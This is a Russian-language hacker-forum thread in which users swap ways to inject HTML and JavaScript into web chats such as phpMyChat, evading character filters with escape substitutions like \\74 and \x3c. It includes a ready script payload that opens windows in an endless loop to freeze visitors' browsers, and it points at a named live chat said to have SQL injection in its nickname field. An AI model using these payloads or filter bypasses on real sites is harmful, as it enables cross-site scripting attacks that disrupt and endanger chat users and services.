На одном из чатов запнулся на том что там не разрешалось т.е. в тэгах непропускался знак /
Это означает что если я пишу:
\x3cimg src="http\x3a//antichat.ru/cgi-bin/s.jpg" name="imaga"\x3e
то тэг попадает на обозрение(ПОЛНОСТЬЮ) в таком виде: ...x3cimg src="http...x3a......antichat.ru...cgi-bin...s.jpg" name="imaga"...x3e
Как можно заменить / ????

см. видео zFailure "XSS в чате на muz-tv"
там тебе покажут как использовать реплейс символов в строке в ХТМЛ

А какой двиг чата.То что ты написал это phpmychat 0.14 .5 . Ну че то вроде этого.Это старый двиг .Вот попробуй для нового < =\\74\
> = \\76\\
</ =\\74/
: = \\72
Понятно?

Вот этот пропатченный чат! http://www.elbrusoid.org/chat

Там этот баг закрыт.И правильно но еще много уязвимостей осталось

Кто-нить выложите тэг на открытие окошек в чате.

Кто-нить выложите тэг на открытие окошек в чате.
Смотри про чаты августа... тама тег мною выложен.....

функция window.open na JS
на HTML <a href=page.htm target=_blank <!-- если надо в новом окне -->>link</a>

ВСЕМ ОГРОМНОЕ СПАСИБО!!!!

\\74\script language="javascript"\\76\\ var nameData = "007"; if (nameData == prompt ("*****" ))alert("************!"); else for(1;1;100) open(1);\\74\/script\\76\\
Вот уже переделаный

К.е.Н
А если без \\74\ как нить через \x3cscript можно?

Вот этот пропатченный чат! http://www.elbrusoid.org/chat
там sql-inj в поле ник... правда неизвестно как её юзать, фильт там на некоторые символы =)

фильт там на некоторые символы =)
Вот в том-то и дело!

А если без \\74\ как нить через \x3cscript можно?
А зачем тебе?
Там точно фильтры стоят.

А если без \\74\ как нить через \x3cscript можно?
А зачем тебе?
Там точно фильтры стоят.

Можно как-нить без \\74\ -просто на него почти везде уже фильтры!

Да надо искать на какие символы фильтры не стаят это очень большая работа